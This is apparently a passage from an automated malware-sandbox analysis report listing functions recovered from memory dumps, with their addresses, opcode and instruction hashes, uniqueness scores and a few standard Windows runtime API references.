Opcode Fuzzy Hash: a0e58e0571aca402399bb53e6b86d92f4222e1682863425719dfa7bea88717fd
Instruction Fuzzy Hash: 13910431B002159FDB15EBB4C8516BE7BA6EF88340F15842ED406DB795DF7C9D028BA2

Uniqueness

Uniqueness Score: -1.00%

Function 00780958, Relevance: .2, Instructions: 225COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 962e433c433108f327358b1aedd16d18b865abc2c7347ca543f4f9fe82bb1eb3
Instruction ID: a577abf9edb88fea600a4c8ff9dfed4fecbbb6935a772e373a1e5f951bf494e1
Opcode Fuzzy Hash: 962e433c433108f327358b1aedd16d18b865abc2c7347ca543f4f9fe82bb1eb3
Instruction Fuzzy Hash: 00817C347502458FCB99EF39C888A6D7BE5AF89314F1940A9E805CB3B1DB78DC45CB91

Uniqueness

Uniqueness Score: -1.00%

Function 0078FCC1, Relevance: .2, Instructions: 215COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 091eaf5b34b3c367d4ba81e36966844d83831190c9893d65d13f3cc5cfd6d74c
Instruction ID: 14f0c61f372af51728ea838053c15bb6feb0ab29833a7fe76e747e575442c8c0
Opcode Fuzzy Hash: 091eaf5b34b3c367d4ba81e36966844d83831190c9893d65d13f3cc5cfd6d74c
Instruction Fuzzy Hash: 7A71C630B492848FD706A774D8256AA3BB29F46304F1680B6D546EB3A7DA3CDC09C721

Uniqueness

Uniqueness Score: -1.00%

Function 00782838, Relevance: .2, Instructions: 188COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a06f6031b7ae6d20175835ee7b69512840ca31d3cdfe0767ab8c4b9110369ec5
Instruction ID: 1821f128bff99b57c490a6771377e512ef63a2ee29eee0d40ac92662fccc72ae
Opcode Fuzzy Hash: a06f6031b7ae6d20175835ee7b69512840ca31d3cdfe0767ab8c4b9110369ec5
Instruction Fuzzy Hash: 3C610B31E402158FDB25EB68C8947BEB6F3AF85305F24C069C405AB392DF789D86C792

Uniqueness

Uniqueness Score: -1.00%

Function 00785BE0, Relevance: .2, Instructions: 169COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 358bdb66b8a408a6f28b5eabf530188ed78e6c280fcfd37c2cff122a0f1d3a9f
Instruction ID: e7153595a9127482ba3198aa531a44af79d60a18f490f99f293a109ad43498f2
Opcode Fuzzy Hash: 358bdb66b8a408a6f28b5eabf530188ed78e6c280fcfd37c2cff122a0f1d3a9f
Instruction Fuzzy Hash: 4951F631F416204BEF257B3488AA37E65879B81350F19C078E81A9F3C5DE7C8D4683E2

Uniqueness

Uniqueness Score: -1.00%

Function 0078EA68, Relevance: .2, Instructions: 150COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 578b0d4e5a7e8b51d335892c70f1660f1d50a14795ca627649b017b3feca7e9f
Instruction ID: 8a902e112b7b3464fcc9ba0a30ebb298911c46e8f264c1f443a9ae63bee06e54
Opcode Fuzzy Hash: 578b0d4e5a7e8b51d335892c70f1660f1d50a14795ca627649b017b3feca7e9f
Instruction Fuzzy Hash: 0D61A074D01218DFCB14EFB4D859A9DBBB2BF88311F10846AE90AAB254EF359946CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00781620, Relevance: .1, Instructions: 134COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 62289238af689dcd4552c2c3e0eb0eca54dce8e73e520ade7432cff0d5986161
Instruction ID: b788db6c7aef1b7b57a7cfd301d04e5f9a8873bb909c8983191297239c43d01f
Opcode Fuzzy Hash: 62289238af689dcd4552c2c3e0eb0eca54dce8e73e520ade7432cff0d5986161
Instruction Fuzzy Hash: C6516B74E007498FDF12DFA5C5406EEBBF6AF8A310F648619E809AB241D774AD86CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00780E03, Relevance: .1, Instructions: 123COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2b7e2c8cefbefbd0c2f92c6d76f5ef12aef0dee08e4306f9a3e0bda40f3a3534
Instruction ID: b04a3b3bd6ee0dc6dc3e326cde22ac2275cca7507ffd0ee6735e8604146df1b7
Opcode Fuzzy Hash: 2b7e2c8cefbefbd0c2f92c6d76f5ef12aef0dee08e4306f9a3e0bda40f3a3534
Instruction Fuzzy Hash: 3A41D131A44249DFCF51EFA4C844A9EBFB2EF49310F008456E915AB2A1D338E958CBD0

Uniqueness

Uniqueness Score: -1.00%

Function 0078ABD0, Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: da5569dce5f5719e8a9098a1cef23b72a409a382b38486b870ad9fbc20fb5f8b
Instruction ID: 37b23b1281ad6b9bc2705edb0420ad985ebb97460d9761fb5dad8a7bcd889ddb
Opcode Fuzzy Hash: da5569dce5f5719e8a9098a1cef23b72a409a382b38486b870ad9fbc20fb5f8b
Instruction Fuzzy Hash: C331B130B45205DFCB44EBB8D8515AE7BF2AF89200B24806ED40ADB395EF389D028B91

Uniqueness

Uniqueness Score: -1.00%

Function 0078F5F0, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: edd628075b14ff1ec502618b2c86bac6552570f0482c63eed38f822cbed0c3a5
Instruction ID: c8f203f5ce23c0e1699eb9e998d33dbaec8a2d9df87c48d3bdfb83fc21567018
Opcode Fuzzy Hash: edd628075b14ff1ec502618b2c86bac6552570f0482c63eed38f822cbed0c3a5
Instruction Fuzzy Hash: F131CF35F492548FCB41FB78D8459AE7BF1AF89310B6480BAD109EB365EB389C05CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00788FE8, Relevance: .1, Instructions: 98COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3e87b802834d85503dfdfdb9568ee9360f7c13c985736265ee9f19a7ce8b97b7
Instruction ID: b6f38d090f7976913f7050edaeb7d45ff835caf942ed659d5f2de3c96b697e0c
Opcode Fuzzy Hash: 3e87b802834d85503dfdfdb9568ee9360f7c13c985736265ee9f19a7ce8b97b7
Instruction Fuzzy Hash: 3C31D63170D2818FD702A37498296AA7BA19F87304F1A81E6C145DF693DB69CC0AC352

Uniqueness

Uniqueness Score: -1.00%

Function 0078EA08, Relevance: .1, Instructions: 90COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2ed6de13ac932c9097650a26e0359fadb9e40b44923963fe48ef6d3a16ce2a81
Instruction ID: b623c0cc66aa431323eb344433a1cb33a5d860a7da478e6eb64553ce63187221
Opcode Fuzzy Hash: 2ed6de13ac932c9097650a26e0359fadb9e40b44923963fe48ef6d3a16ce2a81
Instruction Fuzzy Hash: A3317070E492498FCB41EBB4D8696ACBFB2BF46300F5484AAD545EB293DB389D05CB11

Uniqueness

Uniqueness Score: -1.00%

Function 00780C38, Relevance: .1, Instructions: 83COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 736482e46879c13cb9a33cff01154e3ff903d5652780cc7bc315a301ee443d14
Instruction ID: 54c99db346a29c51eed6f668540d3276884d42c955d5d7097b86952f800d7658
Opcode Fuzzy Hash: 736482e46879c13cb9a33cff01154e3ff903d5652780cc7bc315a301ee443d14
Instruction Fuzzy Hash: 0B31E3325042588FCB02DFA8D8404EDFBB1FF49320B168567E804AB245C335A95ACBB0

Uniqueness

Uniqueness Score: -1.00%

Function 0078A102, Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7ee604ede27514f13d18babcebcf9fdc3f2283bc4140d47a1ab1c40c72044073
Instruction ID: db557541f993334eb397cb41b2d66097e22bd960c35ef017fbb28306041e968a
Opcode Fuzzy Hash: 7ee604ede27514f13d18babcebcf9fdc3f2283bc4140d47a1ab1c40c72044073
Instruction Fuzzy Hash: 48214F31B4E3815FE706977499256A67FF24B97311F1A80EBD149CB6A3D96CCC0AC312

Uniqueness

Uniqueness Score: -1.00%

Function 0078BA20, Relevance: .1, Instructions: 76COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8966791d777ead338245996cbb2a4c9cc921ee6527e418cc14a0fe84e03f9674
Instruction ID: d984e7604763a4e840234e26cce4b53bdb88f379d8907a0e56f6e97b0b930062
Opcode Fuzzy Hash: 8966791d777ead338245996cbb2a4c9cc921ee6527e418cc14a0fe84e03f9674
Instruction Fuzzy Hash: A8210730B093808FCB01A77498696A97FB1AF86314F1485BAD506CF6E6EF39CD06C391

Uniqueness

Uniqueness Score: -1.00%

Function 0080D53C, Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946922721.000000000080D000.00000040.00000001.sdmp, Offset: 0080D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b2d08cc4bf8550c4cb9a635ca40386eb485746e149b6f313c8136a70bdf0d7a
Instruction ID: 7467c05fdde73aff096ffce5ccb5c3a8eda66d4ef16a121d0c7a0144fa622acc
Opcode Fuzzy Hash: 5b2d08cc4bf8550c4cb9a635ca40386eb485746e149b6f313c8136a70bdf0d7a
Instruction Fuzzy Hash: 8E21F1B1504344DFDB45DF90DCC0B66BB65FB98328F248569E8098B686C336D816CAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00BDD01C, Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.947290076.0000000000BDD000.00000040.00000001.sdmp, Offset: 00BDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 536eb91369af5311115293361dbfe4c133e6bbbe82e2d39318993b85b046304e
Instruction ID: 7ae4929ad08d938a4ae58328501f5b26b5e37e7bcac10dc3c74e79866d40eef6
Opcode Fuzzy Hash: 536eb91369af5311115293361dbfe4c133e6bbbe82e2d39318993b85b046304e
Instruction Fuzzy Hash: 0D21D375504240DFDB14DF14D8D0B16FBA5FB88314F24C5AAD88A4B746D336D80ACAA1

Uniqueness

Uniqueness Score: -1.00%

Function 00788C68, Relevance: .1, Instructions: 69COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 539b42e5ef6353ec7b0d817e10fed988c85117e8a040e94ba8ab8f31eadc749a
Instruction ID: d0391cffb62befa2cd9e252f9bee950c79fcc6205704509782d6706184f2e9b7
Opcode Fuzzy Hash: 539b42e5ef6353ec7b0d817e10fed988c85117e8a040e94ba8ab8f31eadc749a
Instruction Fuzzy Hash: F7219271B012058FCB50EBB8D4556AEB7F2EF89314B10886DD509DB751EF389D058BD2

Uniqueness

Uniqueness Score: -1.00%

Function 00783E91, Relevance: .1, Instructions: 65COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3cec9c06bf2b745d4be5d56f1f4abf35f7607c12ec6f0ee304f742d4c07597f3
Instruction ID: c1c6f87a9192951fcf1952448b512b1bc150f44e23a535701033a581654bd4f3
Opcode Fuzzy Hash: 3cec9c06bf2b745d4be5d56f1f4abf35f7607c12ec6f0ee304f742d4c07597f3
Instruction Fuzzy Hash: 3F217C70E012499FCB05DFA9D454AEEBFB6EF48704F24806AF901E6264DB34DA41DFA0

Uniqueness

Uniqueness Score: -1.00%

Function 00789098, Relevance: .1, Instructions: 64COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 61df6d6cbc8f5ec5a766441e268fcc87c851ef1ff0f5dbe1b358e20e811b9e66
Instruction ID: bb53314dcefcc04cb2d008d019019c17e939c9dd71ac9cf71af212cabf4d3b29
Opcode Fuzzy Hash: 61df6d6cbc8f5ec5a766441e268fcc87c851ef1ff0f5dbe1b358e20e811b9e66
Instruction Fuzzy Hash: 8E11B631B041189BCF14BBB8D8195EE77E29FC9315B158568D506D7390EF38DD0687E1

Uniqueness

Uniqueness Score: -1.00%

Function 0078AD37, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: cb33c7ede8500dc78586b602933a4d3d43bdd05d79ab82026d65abe7e33a07bc
Instruction ID: aa4b76b3608ec13ab326b50491603ceae7adc286ecf5c60e775d15fded97cfd0
Opcode Fuzzy Hash: cb33c7ede8500dc78586b602933a4d3d43bdd05d79ab82026d65abe7e33a07bc
Instruction Fuzzy Hash: A311E03178D3845FDB02A778D8515D97FB29F86301F1680B7D149CBAA7EA689C0A8722

Uniqueness

Uniqueness Score: -1.00%

Function 00780EE0, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dacd08023259ee30db3671c01aeacf46b797e8e8bb0efb3f1c349cc2e59c8fe8
Instruction ID: 25745fd87e7deab495c1d1f6dedd1f1b98f62aec5e6467c42e0e904c5da09186
Opcode Fuzzy Hash: dacd08023259ee30db3671c01aeacf46b797e8e8bb0efb3f1c349cc2e59c8fe8
Instruction Fuzzy Hash: 36213631A40245DFDF60EF68C88179FBBA2EF85320F14C655E6189B2A2D374E819CBD4

Uniqueness

Uniqueness Score: -1.00%

Function 00BDD005, Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.947290076.0000000000BDD000.00000040.00000001.sdmp, Offset: 00BDD000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d7564c1b89c3d6920ba4b43b8de66a9fc448f2a43286264419c7336c06253fd8
Instruction ID: 5a4d6c868a8644fdfb5dbbaf15e80cd07467518ca2984157b35f3e9a6e7a665b
Opcode Fuzzy Hash: d7564c1b89c3d6920ba4b43b8de66a9fc448f2a43286264419c7336c06253fd8
Instruction Fuzzy Hash: 9B2171755093808FCB12CF20D5A0715BF71EB46214F28C5DBD8898B657C33A980ACB62

Uniqueness

Uniqueness Score: -1.00%

Function 0080D537, Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946922721.000000000080D000.00000040.00000001.sdmp, Offset: 0080D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8868f1bf3fef70adb895c908377faa64ebfd00bae7f981e8341c8129ec4eea00
Instruction ID: dff1d849a1f3bb05c8e441451249ec1a2e5ccd55ac3c154cf000fec96d1e353b
Opcode Fuzzy Hash: 8868f1bf3fef70adb895c908377faa64ebfd00bae7f981e8341c8129ec4eea00
Instruction Fuzzy Hash: 1711AF76404380CFCB16CF50D9C4B16BF62FB94324F2486A9D8098B656C336D85ACBA1

Uniqueness

Uniqueness Score: -1.00%

Function 0078B960, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50c5c36067626946b8b41d14e755fb3d2efeceedb201e8792650ccd2a830f169
Instruction ID: ac603c3e8b533d7b294f6b47d30075e45ab906c359fa706bd47775448a1bb136
Opcode Fuzzy Hash: 50c5c36067626946b8b41d14e755fb3d2efeceedb201e8792650ccd2a830f169
Instruction Fuzzy Hash: F3115E31B412189F8B80FB78D8559AEB7F1FF8C2107A48469E10AE7364EF389D018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0078F530, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdf6ba8209cee6701669f10ec64460c516b273a2e8c8f3b30f92a98435d72083
Instruction ID: b13d084361195443903882dbcd6f98c888ce16d31bd428ad73bd8d4714798e60
Opcode Fuzzy Hash: fdf6ba8209cee6701669f10ec64460c516b273a2e8c8f3b30f92a98435d72083
Instruction Fuzzy Hash: 43115E31F411149F8B80FF78D8559AEB7F1BF8C2107508429E109E7354EF389D018B91

Uniqueness

Uniqueness Score: -1.00%

Function 0078F650, Relevance: .1, Instructions: 52COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 4d8c70d6d2af665814000895941cc1fecec0ab46adc05bf1fed887acd9ceb610
Instruction ID: a2c3c81b737fa9a353ee8c0e0283375ef92c51ea39df48c0fe31af48b9266a99
Opcode Fuzzy Hash: 4d8c70d6d2af665814000895941cc1fecec0ab46adc05bf1fed887acd9ceb610
Instruction Fuzzy Hash: C0115231F411149F8B40FB78D8559AE7BF1BF8C3107508529D109E7354EF389D018BA1

Uniqueness

Uniqueness Score: -1.00%

Function 0078A1B0, Relevance: .1, Instructions: 51COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f33b8eafbc62a7001d3ed4526fbeeb3585db421a42ff1bddb5e63b0afddde203
Instruction ID: 563d814bacf09fff487bab0f2fbf288aa562fc005158f1f3e1bd7ddc55e994cd
Opcode Fuzzy Hash: f33b8eafbc62a7001d3ed4526fbeeb3585db421a42ff1bddb5e63b0afddde203
Instruction Fuzzy Hash: A001B531B007109FD734AB75A41866EBAEADBC5306F04C42BE41AC3651DE7EEC46C741

Uniqueness

Uniqueness Score: -1.00%

Function 007899AA, Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 401bf10f18f0df5130ac20d360d0eb1777661b8b57b2311c2405a087129594c2
Instruction ID: cedaa88071c2ead6d13cf5f50bb218484422f85d6bfeab193c5eb41459df49eb
Opcode Fuzzy Hash: 401bf10f18f0df5130ac20d360d0eb1777661b8b57b2311c2405a087129594c2
Instruction Fuzzy Hash: 5801B171F052058FCB80EBB89A051EEBBF2EF85350B14446AC50AE7354EB349D018BD1

Uniqueness

Uniqueness Score: -1.00%

Function 0078ACD8, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9012c8767abd98da274e17886a744226e47f1b27da058c2f0c1d657e479926cf
Instruction ID: 9027ee2f66d575d9168ecd145a7bfefbbd2c51bc653c24616c112ed14579758d
Opcode Fuzzy Hash: 9012c8767abd98da274e17886a744226e47f1b27da058c2f0c1d657e479926cf
Instruction Fuzzy Hash: 6EE0C036B411148B8B40F7B8D4594DDB3F1ABCC2257108169D506D7354DE389C018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0078B9BF, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: aaeb1f5dae2d46f1685dbb549e4a50269f513cb1d8a8dd738e0b9b0b8dccd75d
Instruction ID: 2fc46b8ed32435dba5284df203675a46d92e96afcfca308f542707be62229c52
Opcode Fuzzy Hash: aaeb1f5dae2d46f1685dbb549e4a50269f513cb1d8a8dd738e0b9b0b8dccd75d
Instruction Fuzzy Hash: F6E0ED36B401148BCF44F7B8D45A4DDB3E1BFC83247508065D50AE7365EF389D018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0078F58F, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b1c8d695db87d6e77519989bf9bae22d2e854beb183ce5f42e1f54b33c727c8f
Instruction ID: 1850d97a15828855d672a2d98982e1fc782e98ec0e61fe8aaf6f3f541adb5991
Opcode Fuzzy Hash: b1c8d695db87d6e77519989bf9bae22d2e854beb183ce5f42e1f54b33c727c8f
Instruction Fuzzy Hash: EEE0ED36B401148BCF40FBB8D45A8DDB3E1BFC83247108069D50AE7365EF389C018B61

Uniqueness

Uniqueness Score: -1.00%

Function 0078F6AF, Relevance: .0, Instructions: 25COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8b1544cd0b5a2fa32b4d2702cc157a8c83c7e648fa9aae9481b7919ac1ad89a5
Instruction ID: a8dcaac8fec7914265780032757b4b7c1aa8bf105d2aac939c05382b9fdd605d
Opcode Fuzzy Hash: 8b1544cd0b5a2fa32b4d2702cc157a8c83c7e648fa9aae9481b7919ac1ad89a5
Instruction Fuzzy Hash: BAE0ED36B401148BCF40F7B8D85A4DDB7E1AFC83247508065D50AEB365EF389D058B61

Uniqueness

Uniqueness Score: -1.00%

Function 00786988, Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 16b94e89132cad668c070eeab3f1e38ce34a8721a75f65bcd42d2c5a4654965c
Instruction ID: f472a1f3ba0ea97b4d6d43977079e39ff9f897cfbef44ceaca790ba472a8f5f1
Opcode Fuzzy Hash: 16b94e89132cad668c070eeab3f1e38ce34a8721a75f65bcd42d2c5a4654965c
Instruction Fuzzy Hash: 03E0E639F511148FCB189B75A8585BD77E7F7CC211F189475E50BC3245DE385C529B40

Uniqueness

Uniqueness Score: -1.00%

Function 0078F45C, Relevance: .0, Instructions: 18COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946805053.0000000000780000.00000040.00000001.sdmp, Offset: 00780000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c25d7c2f618822fbeedcb50c8b765602f928b7b77751bfce76069257564dea2f
Instruction ID: b08bf1fa45974c6abd16059bffff36c820ca07c7b951e5954c3d235461cbaebc
Opcode Fuzzy Hash: c25d7c2f618822fbeedcb50c8b765602f928b7b77751bfce76069257564dea2f
Instruction Fuzzy Hash: ADD0120175136A6A5F1826B6152017F20C71BC42DABA54C77D99ACE3F5FF1CC98523A2

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0043FBB5, Relevance: 7.6, APIs: 5, Instructions: 58COMMON

Download Yara Rule

APIs

IsDebuggerPresent.KERNEL32 ref: 00441B4E
SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00441B63
UnhandledExceptionFilter.KERNEL32(00445920), ref: 00441B6E
GetCurrentProcess.KERNEL32(C0000409), ref: 00441B8A
TerminateProcess.KERNEL32(00000000), ref: 00441B91

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
String ID:
API String ID: 2579439406-0
Opcode ID: a0102ef4df40c4ed6bdeafeff6a1efefd1bb06bf984cf2cb6a2abd61abeb4e58
Instruction ID: ad97b328646b0f5c21c4603648088ab48ab8018b5ee77c6ea2abebdaacd08cdf
Opcode Fuzzy Hash: a0102ef4df40c4ed6bdeafeff6a1efefd1bb06bf984cf2cb6a2abd61abeb4e58
Instruction Fuzzy Hash: 0821FEBC800204DFE740EF25ECA4A587BE4FB0A310F60503EEA0887662EBB45980CF5D

Uniqueness

Uniqueness Score: -1.00%

Function 0043E746, Relevance: 1.5, APIs: 1, Instructions: 4COMMON

Download Yara Rule

APIs

SetUnhandledExceptionFilter.KERNEL32(Function_00001704), ref: 0043E74B

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: ExceptionFilterUnhandled
String ID:
API String ID: 3192549508-0
Opcode ID: ebe1bc7784b0b339015d6146758e1c4b0f1f2746be48a6762befe65825040257
Instruction ID: 930bbcf254d6beaed574a07ced69f04423afe42dc64f1eef5d0d5c35662008c7
Opcode Fuzzy Hash: ebe1bc7784b0b339015d6146758e1c4b0f1f2746be48a6762befe65825040257
Instruction Fuzzy Hash: EB9002A86625018B8A0017B15C0D54966906B4D702B516461A105D4099EB644400556A

Uniqueness

Uniqueness Score: -1.00%

Function 00443412, Relevance: .0, Instructions: 13COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
Instruction ID: bd968d438cf1f7cc48d2699aa6dc25f788ce626c8300f247f0c3ea38afe2aafd
Opcode Fuzzy Hash: e624ca07e480b20f3e87d250268d7befd875a58a2c7744576e64497166e65542
Instruction Fuzzy Hash: 82D0C970A1528CEFEB16CF58D116BCEBBB8AB01748F600085D4415B356C2B9AF42DB99

Uniqueness

Uniqueness Score: -1.00%

Function 004434D0, Relevance: .0, Instructions: 11COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
Instruction ID: 012b87460875e0268afdfdc0b978a6a710eff959b0745fce16cd901dd271b764
Opcode Fuzzy Hash: c38f530f393c8e445e7f9ebfc598e40a83d4b02ab9be02f0dcf01f71a647c4e9
Instruction Fuzzy Hash: 91D0127090528CEFEB11CF45D206B8ABBF8EB00B4CF108088E00597681C3BAAF44D744

Uniqueness

Uniqueness Score: -1.00%

Function 0043F03C, Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(KERNEL32.DLL,00446660,0000000C,0043F177,00000000,00000000,?,?,0043E6BF,0043D10E), ref: 0043F04E
__crt_waiting_on_module_handle.LIBCMT ref: 0043F059

Part of subcall function 0043E15C: Sleep.KERNEL32(000003E8,?,?,0043EF9F,KERNEL32.DLL,?,0043E6EC,?,0043D108,?), ref: 0043E168
Part of subcall function 0043E15C: GetModuleHandleW.KERNEL32(?,?,?,0043EF9F,KERNEL32.DLL,?,0043E6EC,?,0043D108,?), ref: 0043E171

GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 0043F082
GetProcAddress.KERNEL32(?,DecodePointer), ref: 0043F092
__lock.LIBCMT ref: 0043F0B4
InterlockedIncrement.KERNEL32(004474D8), ref: 0043F0C1
__lock.LIBCMT ref: 0043F0D5
___addlocaleref.LIBCMT ref: 0043F0F3

Strings

DecodePointer, xrefs: 0043F08A
KERNEL32.DLL, xrefs: 0043F048, 0043F04D, 0043F058
EncodePointer, xrefs: 0043F076

Memory Dump Source

Source File: 00000001.00000002.946436022.000000000043D000.00000040.00000001.sdmp, Offset: 0043D000, based on PE: false

Similarity

API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
String ID: DecodePointer$EncodePointer$KERNEL32.DLL
API String ID: 1028249917-2843748187
